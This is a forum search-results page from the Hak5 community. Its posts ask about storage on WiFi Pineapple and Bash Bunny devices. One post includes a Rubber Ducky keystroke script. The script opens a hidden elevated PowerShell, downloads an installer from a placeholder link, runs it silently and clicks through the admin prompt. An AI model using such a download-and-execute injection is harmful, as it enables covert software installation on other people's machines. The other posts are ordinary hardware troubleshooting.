Jump to content

Search the Community

Showing results for tags 'storage'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
    • Plunder Bug
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 9 results

  1. I’d like to install modules to a USB flash drive and am using the Tetra, v1.1.2, how do I get the Modules -> Manage Modules page to show up with an ‘Install to USB Storage’ button? If that’s not supported in the GUI then how can I attached USB storage and use it for modules beyond just for the swap space? I noticed a bug report asking for the removal of the install to internal storage button altogether but since there is a USB port which can be used with a flash drive or USB w/microSD card on the Tetra, the functionality should be supported just the same as it is on the Nano. bug ref: https://www.wifipineapple.com/bugs/438 In my case I’m plugging a USB flash drive directly into the USB port on the back. So far I’ve tried two different flash drives, a 32GB Samsung USB 3.0 MUF-32BB/AM and a 4GB USB 2.0 Generic. Configured an ext4 partition for the usb folder and a linux-swap partition. They show up fine, no problems or errors formatting or mounting. However there’s still no option showing up in the GUI to install to USB storage. I’ve crawled through the forums and tried various suggestions with no luck so appreciate any guidance, what am I missing and is there a workaround? —— ADVANCED / GUI menu Firmware Upgrade (Current version: 1.1.2) USB Bus 001 Device 002: ID 058f:6387 Alcor Micro Corp. Flash Drive Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub config 'global' option anon_swap ‘1’ option anon_mount ‘1’ option auto_swap '1' option auto_mount '1' option delay_root '5' option check_fs '0' config 'mount' option target '/usb' option device '/dev/sda1' option fstype 'ext4' option options 'rw,sync' option enabled '1' config 'swap' option device '/dev/sda2' option enabled '1' Resources Filesystem Size Used Available Use% Mounted on rootfs 1.8G 27.9M 1.8G 2% / /dev/root 12.5M 12.5M 0 100% /rom tmpfs 61.5M 492.0K 61.0M 1% /tmp /dev/ubi0_1 1.8G 27.9M 1.8G 2% /overlay overlayfs:/overlay 1.8G 27.9M 1.8G 2% / tmpfs 512.0K 0 512.0K 0% /dev /dev/sda1 979.4M 1.9M 910.2M 0% /usb total used free shared buffers Mem: 125868 68864 57004 524 9708 -/+ buffers: 59156 66712 Swap: 1052252 0 1052252 ----------- CLI root@Pineapple:/tmp# lsusb Bus 001 Device 002: ID 058f:6387 Alcor Micro Corp. Flash Drive Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub root@Pineapple:/tmp# fdisk -l /dev/sda Disk /dev/sda: 4089 MB, 4089446400 bytes 255 heads, 63 sectors/track, 497 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sda1 1 131 1052226 83 Linux /dev/sda2 132 262 1052257+ 82 Linux swap root@Pineapple:/tmp# df -hT Filesystem Type Size Used Available Use% Mounted on rootfs rootfs 1.8G 27.9M 1.8G 2% / /dev/root squashfs 12.5M 12.5M 0 100% /rom tmpfs tmpfs 61.5M 492.0K 61.0M 1% /tmp /dev/ubi0_1 ubifs 1.8G 27.9M 1.8G 2% /overlay overlayfs:/overlay overlay 1.8G 27.9M 1.8G 2% / tmpfs tmpfs 512.0K 0 512.0K 0% /dev /dev/sda1 ext4 979.4M 1.7M 910.3M 0% /usb root@Pineapple:/tmp# cat /etc/opkg.conf dest root / dest ram /tmp lists_dir ext /var/opkg-lists option overlay_root /overlay dest usb /usb root@Pineapple:/# dmesg | grep sda [ 20.490000] sd 0:0:0:0: [sda] 7987200 512-byte logical blocks: (4.08 GB/3.80 GiB) [ 20.490000] sd 0:0:0:0: [sda] Write Protect is off [ 20.500000] sd 0:0:0:0: [sda] Mode Sense: 23 00 00 00 [ 20.500000] sd 0:0:0:0: [sda] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA [ 20.520000] sda: sda1 sda2 [ 20.520000] sd 0:0:0:0: [sda] Attached SCSI removable disk [ 29.430000] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: [ 29.570000] Adding 1052252k swap on /dev/sda2. Priority:-1 extents:1 across:1052252k root@Pineapple:/#
  2. Good evening all, I've just taken ownership of one of these cracking little devices and I'm just trying to get to grips with its use of the built in storage. I've run a couple of Catpures via the Recon scan page but don't seem to be able to find the scans, am I missing something obvious? Also I've had a module installed that was 10k and deleted it as it was complaining I had no room for installing a 4k one but it's still complaining. I've ordered an 8gb SD card so hopefully that will resolve the problem in the end but be nice to know whats happening now. It's just a bit odd its saying no space even after removing a larger module. This is my filesystem atm. Do the files get stored in /rom or /dev? /tmp has LOADS of space spare.? Filesystem Size Used Available Use% Mounted on rootfs 2.4M 2.2M 208.0K 92% / /dev/root 12.5M 12.5M 0 100% /rom tmpfs 29.8M 172.0K 29.7M 1% /tmp /dev/mtdblock3 2.4M 2.2M 208.0K 92% /overlay overlayfs:/overlay 2.4M 2.2M 208.0K 92% / tmpfs 512.0K 0 512.0K 0% /dev Thanks for any help, Jase
  3. I am playing with my NANO. I've been trying to do site surveys and it keeps freezing up, even though I move all the modules to an SD card to use that storage. Without that I couldn't even get it installed. I see an article where one person took a USB drive, formatted to ext and used that on the pineapple. Is that a recommended thing. I'm find I can do things for a short amount of time, but things just freeze up alot. Hoping I'm just missing something Thanks
  4. Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot
  5. Hi everyone, Don't mean to bother this time around, but this time I really have a weird issue. It appears that the storage partition of my bunny has become corrupted in some way. For one, I have had files become corrupted individually, specifically those gotten from the USB exfiltration payload. The bunny also appears read only to my linux machine, and even worse is the fact that deleted files are coming back to my bunny. Yes, you read that right. Is the Bash Bunny using some CoW filesystem or something? I've tried to add and test a new payload, and I copy the payload.txt and the readme.md, over the old payload.txt (without a readme file), and it works. However, as soon as I plug it back in, the only payload there is the old one, and the readme is gone as well. Has anyone dealt with anything like this? Should I format it in windows? Forcing a reset hasn't worked for me yet.
  6. Greetings. When i plug in my Bashbunny it opens its storage not only in armed mode. Is it supposed to do that? Thanks.
  7. Hello, Just yesterday i got my WiFi Pineapple Nano Tactical took it out the box and went straight to being a kid in a candy store setting it up and just messing with it and seeings it's capabilities i let the battery charge overnight and decided i'd take a look at it today and see what i can learn yet the issue is STORAGE! and the main thing contributing to that me thinking i'd have more storage than i did or i could just uninstall the modules i could go rampage and just get some modules that sound nice and test them out but now i've come to the problem i can't remove them no matter if i go to the module and remove dependencies it doesn't or to the manage modules and remove it says successful but it is not so i went to the conclusion that i would expand storage eitherway so why not do it now to kill two birds with one stone? I got a USB 2.0/3.0 compatible flash drive stuck it in the back of the pineapple (USB 2.0 Host Port) and the USB gets power it shows up in the Advanced>USB Area and my USB's LED is on (Indicating it is getting power) Yet i see no install to USB option or extended storage etc the only tutorial i found was for Mk IV and i followed it and formattted the USB for Ext4 etc but now i am unsure where to go Thanks for Reading that but if you just want the brief Skim version look below! Issue 1: I can't uninstall Modules through the Manage Modules or even uninstall dependencies Request 1: Any info on how to fix issue 1 or if not how to go on with Issue 2 Issue 2: After slightly skimming google i only found one decent tutorial on how to set up a USB for storage but it was for wifi pineapple Mk IV and i have the Nano Tactical Elite i've got the USB formatted to Ext4 and plugged into the USB 2.0 Host Port on the back of the Pineapple and it shows up in Advanced>USB but no options to use it as storage Request 2: Any tutorials you guys know or how to continue from my point in issue 2 Random Ponder: Is there any existing module that will auto add SSIDs from scans? or would it be hard for someone with decent computer understanding and few programming languages to make? I want it so i could just walk around with it plugged into Pineapple Juice and as it scans every 15seconds (Continuous) it auto adds them to SSID pool so i thought could be done with PHP Maybe with the issue i have only recently gotten interested in PHP and don't know enough :( Sorry for long post all help is welcome and appreciated!
  8. Maybe someone can share where to find the storage for WiFi Client Mode ssids and associated preshared keys *** no luck here grep -rnw '/' -e "psk" ...but found in plain text: /dev/mtdblock5:6947024:*mixed-psk▒1+tki)L▒.[PINEAPPLE ROOT WEB INTERFACE ACCESS PASS]' *** no luck here Found from the /etc/pineapple/ path then ran sqlite> .open ssid_list.db tried to select * from ssid_list; which yields nothing for me cause I haven't been been adding any to the filter lists I suppose. *** some success here Found from the /etc/config/wireless file held config wifi-iface option device 'radio1' option ifname 'wlan1' option mode 'sta' option key '[THE CURRENT KEY]' option network 'wwan' option ssid '[TO MY CURRENT GATEWAY SSID]' option encryption 'psk2+ccmp+tkip' BUT, I seem to remember these devices keeping the credentials for multiple gateway APs for WiFi Client Mode without having to retype them although the I believe you would need to be either out of range of a previously connected AP for it to connect automatically to the another previous AP that is in range....at worst you would need to restart the pineapple and it would remember the the other AP. My question is: Where does the pineapple store the rest of these ssid's and keys that are not in use? This way when I upgrade I don't have to revisit APs find/remember and fill out credentials every time but instead just copy and paste them to the correct file(s) over ssh or whatever.
×
×
  • Create New...